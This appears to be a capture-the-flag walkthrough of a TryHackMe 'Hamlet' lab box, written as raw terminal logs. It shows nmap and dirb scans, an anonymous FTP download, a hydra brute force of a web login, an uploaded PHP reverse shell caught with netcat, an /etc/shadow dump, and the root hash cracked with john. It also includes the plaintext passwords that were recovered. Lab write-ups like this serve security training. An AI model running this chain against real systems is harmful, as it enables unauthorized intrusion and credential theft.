☁ ~ nmap --min-rate=3000 -sV -sC -o nmap hamlet.thm
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-11 20:04 CEST
Nmap scan report for hamlet.thm (10.10.196.230)
Host is up (0.044s latency).
Not shown: 984 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rwxr-xr-x 1 0 0 113 Sep 15 2021 password-policy.md
|_-rw-r--r-- 1 0 0 1425 Sep 15 2021 ufw.status
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.18.14.219
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a0:ef:4c:32:28:a6:4c:7f:60:d6:a6:63:32:ac:ab:27 (RSA)
| 256 5a:6d:1a:39:97:00:be:c7:10:6e:36:5c:7f:ca:dc:b2 (ECDSA)
|_ 256 0b:77:40:b2:cc:30:8d:8e:45:51:fa:12:7c:e2:95:c7 (ED25519)
80/tcp open http lighttpd 1.4.45
|_http-server-header: lighttpd/1.4.45
|_http-title: Hamlet Annotation Project
8000/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.48 (Debian)
8080/tcp closed http-proxy
50000/tcp closed ibm-db2
50001/tcp closed unknown
50002/tcp closed iiimsf
50003/tcp closed unknown
50006/tcp closed unknown
50300/tcp closed unknown
50389/tcp closed unknown
50500/tcp closed unknown
50636/tcp closed unknown
50800/tcp closed unknown
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.66 seconds
☁ hamlet dirb http://hamlet.thm/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Sep 11 21:17:10 2023
URL_BASE: http://hamlet.thm/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://hamlet.thm/ ----
+ http://hamlet.thm/index.html (CODE:200|SIZE:1011)
+ http://hamlet.thm/robots.txt (CODE:200|SIZE:64)
-----------------
END_TIME: Mon Sep 11 21:20:13 2023
DOWNLOADED: 4612 - FOUND: 2
User-agent: *
Allow: /
THM{1_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
☁ ~ ftp hamlet.thm
Connected to hamlet.thm.
220 (vsFTPd 3.0.3)
Name (hamlet.thm:ysi): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||50995|)
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 113 Sep 15 2021 password-policy.md
-rw-r--r-- 1 0 0 1425 Sep 15 2021 ufw.status
226 Directory send OK.
ftp> get password-policy.md
local: password-policy.md remote: password-policy.md
229 Entering Extended Passive Mode (|||50128|)
150 Opening BINARY mode data connection for password-policy.md (113 bytes).
100% |***********************************************************************| 113 70.46 KiB/s 00:00 ETA
226 Transfer complete.
113 bytes received in 00:00 (2.76 KiB/s)
ftp> get ufw.status
local: ufw.status remote: ufw.status
229 Entering Extended Passive Mode (|||50573|)
150 Opening BINARY mode data connection for ufw.status (1425 bytes).
100% |***********************************************************************| 1425 3.42 MiB/s 00:00 ETA
226 Transfer complete.
1425 bytes received in 00:00 (36.19 KiB/s)
ftp> ^D
221 Goodbye.
$ cewl --lowercase -d 1 -m 12 -w docswords.txt http://hamlet.thm/hamlet.txt☁ hamlet hydra -l ghost -P docswords.txt hamlet.thm http-post-form "/login.html?-1.-loginForm:username=ghost&password=^PASS^:Login failed" -s 8080 -t 2
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-11 20:25:34
[DATA] max 2 tasks per 1 server, overall 2 tasks, 75 login tries (l:1/p:75), ~38 tries per task
[DATA] attacking http-post-form://hamlet.thm:8080/login.html?-1.-loginForm:username=ghost&password=^PASS^:Login failed
[8080][http-post-form] host: hamlet.thm login: ghost password: vnsanctified
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-11 20:26:19
Don't forget that the KEQehFDWwuQbMbKW password does not work for WebAnno.
http://hamlet.thm:8080/projectsetting.html?18 https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
☁ ~ nc -lvnp 4242
Listening on 0.0.0.0 4242
http://hamlet.thm:8000/repository/project/0/document/2/source/php-reverse-shell.php -> Shell opened
$ whoami
www-data
$ ls -alh /etc/shadow
-rw-r----- 1 root shadow 573 Sep 15 2021 /etc/shadow
$ cat /etc/shadow
root:$y$j9T$.9s2wZRY3hcP/udKIFher1$sIBIYsiMmFlXhKOO4ZDJDXo54byuq7a4xAD0k9jw2m4:18885:0:99999:7:::
daemon:*:18872:0:99999:7:::
bin:*:18872:0:99999:7:::
sys:*:18872:0:99999:7:::
sync:*:18872:0:99999:7:::
games:*:18872:0:99999:7:::
man:*:18872:0:99999:7:::
lp:*:18872:0:99999:7:::
mail:*:18872:0:99999:7:::
news:*:18872:0:99999:7:::
uucp:*:18872:0:99999:7:::
proxy:*:18872:0:99999:7:::
www-data:*:18872:0:99999:7:::
backup:*:18872:0:99999:7:::
list:*:18872:0:99999:7:::
irc:*:18872:0:99999:7:::
gnats:*:18872:0:99999:7:::
nobody:*:18872:0:99999:7:::
_apt:*:18872:0:99999:7:::
$ df -h
Filesystem Size Used Avail Use% Mounted on
overlay 19G 7.3G 11G 42% /
tmpfs 64M 0 64M 0% /dev
tmpfs 996M 0 996M 0% /sys/fs/cgroup
shm 64M 0 64M 0% /dev/shm
/dev/mapper/ubuntu--vg-ubuntu--lv 19G 7.3G 11G 42% /stage
$ ls -lah /stage
total 12K
drwxr-xr-x 2 root root 4.0K Sep 15 2021 .
drwxr-xr-x 1 root root 4.0K Sep 15 2021 ..
-rw-r--r-- 1 root root 29 Sep 16 2021 flag
$ cat /stage/flag
THM{4_xxxxxxxxxxxxxx}
Copy $y$j9T$.9s2wZRY3hcP/udKIFher1$sIBIYsiMmFlXhKOO4ZDJDXo54byuq7a4xAD0k9jw2m4 (from /etc/shadow output)
Unshadow: https://erev0s.com/blog/cracking-etcshadow-john/
☁ hamlet john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt passwords.txt
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
murder (root)
1g 0:00:00:16 DONE (2023-09-11 20:50) 0.06042g/s 295.8p/s 295.8c/s 295.8C/s 2222222..asasas
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
$ su -
Password: murder
whoami
root
bash
ls
ls -lah
total 20K
drwx------ 1 root root 4.0K Sep 15 2021 .
drwxr-xr-x 1 root root 4.0K Sep 15 2021 ..
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
-rw-r--r-- 1 root root 24 Sep 16 2021 .flag
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
mkdir /mnt/os-disk
mount /dev/dm-0 /mnt/os-disk
cat /mnt/os-disk/root/flag
THM{6_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}